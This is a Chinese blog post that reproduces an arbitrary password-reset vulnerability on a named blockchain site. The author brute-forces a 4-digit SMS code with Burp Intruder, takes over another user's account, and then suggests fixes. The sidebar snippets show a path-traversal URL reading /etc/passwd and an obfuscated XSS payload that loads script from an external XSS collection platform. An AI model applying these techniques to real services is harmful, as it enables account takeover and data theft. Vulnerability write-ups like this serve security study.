【漏洞学习】DVP-2018-00809(任意密码重置漏洞)

最新推荐文章于 2019-01-16 10:33:43 发布
最新推荐文章于 2019-01-16 10:33:43 发布
阅读量154 收藏
点赞数
分类专栏: # DVP漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84337303
版权

漏洞复现

1、打开国盾区块链通用积分应用中心密码重置url:https://www.guodunc.com/Home/Login/findPwd.html,填入之前注册的手机号,设置密码,然后提交,同时使用burpsuite抓取请求包

intruder:

2、设置code为变量,payload设置为从1000-9999,线程设置为10,跑出结果如下:

3、重新登录,密码已经被设置为新密码了

4、在注册处,发现13800010001已经被注册,使用密码重置,成功将13800010001的账号密码重置为123456aaB,登录如下:

重置成功,登入如下(系统内部账号):

修复建议:

(1)增加验证码位数;

(2)设置验证码过期时间;

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVP-EH-数字量模块
03-15
标题“DVP-EH-数字量模块”和描述“介绍了关于DVP-EH-数字量模块的详细说明,提供台达PLC的技术资料的下载”所涉及的知识点...同时,利用网络资源获取最新的技术资料,是深入学习和应用DVP-EH数字量模块的有效手段。
DVP-ES2/EX2系列台达PLC部件库
11-05
### DVP-ES2/EX2系列台达PLC部件库 #### 一、概述 在工业自动化领域,可编程逻辑控制器(Programmable Logic Controller,简称PLC)是核心设备之一,广泛应用于各种控制场景中。台达DVP-ES2/EX2系列PLC作为一款高...
漏洞学习DVP-2018-01423(XSS+任意用户密码重置
Fly_鹏程万里
11-21 377
声明:该系列所揭示的漏洞目前厂家已经全部修复,此处发布相关的内容只为提供学习用途,请勿做其他恶意破坏。 一、存储型跨站攻击 1)进入平台账户=>财务管理=>资金账户=>添加一条资金账户信息(以添加ETH账户为例),填写资金账户信息,点击“提交”时抓包,添加攻击js代码: 2)提交后,查看前端页面被攻击效果: 查看浏览器加载内容: 3)XSS平台获取到被害者账...
漏洞学习DVP-2018-115219(任意文件读取)
Fly_鹏程万里
01-16 132
漏洞URL:如果是Web就填写此项 http://ethpool.xnpool.cn:9080/assets/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 简要描述:漏洞说明、利用条件、危害等 任意文件读取 漏洞证明: 漏洞利用代码: http://ethpool.xnpool.cn:9080/assets/...
漏洞学习DVP-2018-01183(越权修改任意账户密码
Fly_鹏程万里
01-08 178
简要描述: 忘记密码中的重置功能存在越权和逻辑缺陷,可更改任意账户登录密码 漏洞证明: 第一个是越权漏洞 注册登录后退出,打开忘记密码页面https://www.oex.top/validate/reset_email.html 输入信息获取验证码后来到第二步 进行更改密码并抓包 其中fid参数存在越权,可更改其他账户登录密码 第二个漏洞是这里存在逻辑缺陷,重置一次密码后...
漏洞学习DVP-2018-02639(支付漏洞
Fly_鹏程万里
01-16 143
漏洞URL: https://zbt.one/c2c 简要描述: RT 可以越权修改充值,然后居然会到账,也买了以太坊 漏洞证明: 首先在我的钱包,然后点击充值抓包 然后修改POST提交参数,如图所示 发送数据包 这时候点击确认已汇 不知道为什么过段时间就会自动到账 然后我购买了2个以太坊, 漏洞利用代码: post数据包 POST /c2c/b...
漏洞学习DVP-2018-03869(文件上传)
Fly_鹏程万里
11-21 131
声明:该系列所揭示的漏洞目前厂家已经全部修复,此处发布相关的内容只为提供学习用途,请勿做其他恶意破坏。 漏洞URL: 9158交易所app以及网站:http://www.topbtch.com:8080/index.html、主站http://www.topbtch.com总共三处地方存在上传漏洞。 简要描述: 上传漏洞,可以getshell 漏洞证明: 下载app,上传头像文件,修...
漏洞学习DVP-2018-16101(假充值漏洞
Fly_鹏程万里
01-16 270
漏洞URL: https://www.mv.cool/ 简要描述: 此交易平台充值的时候给了用户一个手动输入检查充值hash 的选项,用户随意在区块上找一个hash可充值成功。造成任意充值。 漏洞证明: 漏洞利用代码: Test account : xxxxx@xxxxxxx.com Test Password:1xxxxxxxa 我刚注册的一个账户,证明可注册 hash...
漏洞学习DVP-2018-08529(绕过加密登陆任意用户)
Fly_鹏程万里
01-16 224
漏洞URL:https://eos.live/ 简要描述:验证码4位数没时间限制 sha256加密截取的4个字符 脚本加密截取即可 漏洞证明: https://eos.live/ 手机验证码登录4位数 这里验证码是加密的 0000是 b336 看了js是sha256加密 截取字符串第五位数开始截取4个字符 解密0000正好是b336 写个脚本循环0000-9999 ...
漏洞学习DVP-2018-01321(严重信息泄露)
Fly_鹏程万里
01-08 176
漏洞描述 : 漏洞URL: http://openapi.yobtc.cn/trace/、http://openapi.yobtc.cn/env、http://openapi.yobtc.cn/health等 简要描述: Spring Boot Actuator监控端点配置不当导致系统应用配置信息、度量指标信息泄露,其中trace路径下记录了最近的100条请求记录信息,请求信息中包含了用...
漏洞学习DVP-2018-01681 (聊天室XSS)
Fly_鹏程万里
01-16 179
漏洞URL:https://dew.one/chat/room 简要描述: 漏洞证明 漏洞利用代码: <img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzc3B0LmNvbS95V0c4M...
dvp-pm_1023_dvp-pm_1023_
09-29
【标题】"dvp-pm_1023_dvp-pm_1023_" 概述 这个名为 "dvp-pm_1023_dvp-pm_1023_" 的程序看起来是一个专门针对DVP-PM系列可编程控制器(PLC)的应用工具或固件更新包。DVP-PM可能是台达电子(Delta Electronics)的...
台达PLC_DVP-ES2系列选型手册.pdf
12-25
【台达PLC_DVP-ES2系列选型手册】是针对台达自动化产品线中的DVP-ES2系列可编程控制器的详细指南,旨在帮助用户进行正确的型号选择和应用设计。DVP-ES2系列作为小型PLC,集成了先进的技术和创新功能,适用于各种工业...
【独家首发】基于蜣螂优化算法DBO-GMDH的风电数据回归预测研究Matlab实现.rar
最新发布
08-14
【独家首发】基于蜣螂优化算法DBO-GMDH的风电数据回归预测研究Matlab实现.rar
深度探索:神经网络在图像识别中的革命性应用
08-14
神经网络是一种受人脑结构启发的数学模型,它由大量的节点(或称为“神经元”)相互连接构成。这些节点通常组织成层,包括输入层、隐藏层和输出层。每个神经元可以接收来自前一层的输入,通过某种激活函数处理这些输入,然后将结果传递给下一层的神经元。 神经网络能够通过学习大量的数据来识别模式和特征,这使得它们在图像识别、语音识别、自然语言处理等领域有着广泛的应用。它们也可以用于预测、分类和回归等任务。 训练神经网络通常涉及到一个称为“反向传播”的过程,通过这个过程,网络可以调整其内部参数(权重和偏置),以便更好地完成特定的任务。这个过程通常需要大量的计算资源,并且伴随着梯度下降或其他优化算法来最小化损失函数,从而提高模型的性能。 随着深度学习技术的发展,神经网络变得更加复杂和强大,出现了各种类型的网络结构,比如卷积神经网络(CNNs)用于图像处理,循环神经网络(RNNs)用于序列数据,以及长短期记忆网络(LSTMs)等。
基础会计教学课件第十一章财务会计报告.pptx
08-14
基础会计教学课件第十一章财务会计报告.pptx
基于Android网络聊天软件APP设计与实现.docx
08-14
基于Android网络聊天软件APP设计与实现.docx
台达Delta DVP-ES2 PLC操作手册:全面指南
台达Delta_DVP-ES2操作手册是深入学习和掌握该系列PLC操作的关键资源,它不仅包含了基本的编程原理和指令使用,还持续更新以适应硬件和软件的最新发展。通过这份手册,用户能够有效地编写、调试和维护PLC程序,提升...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值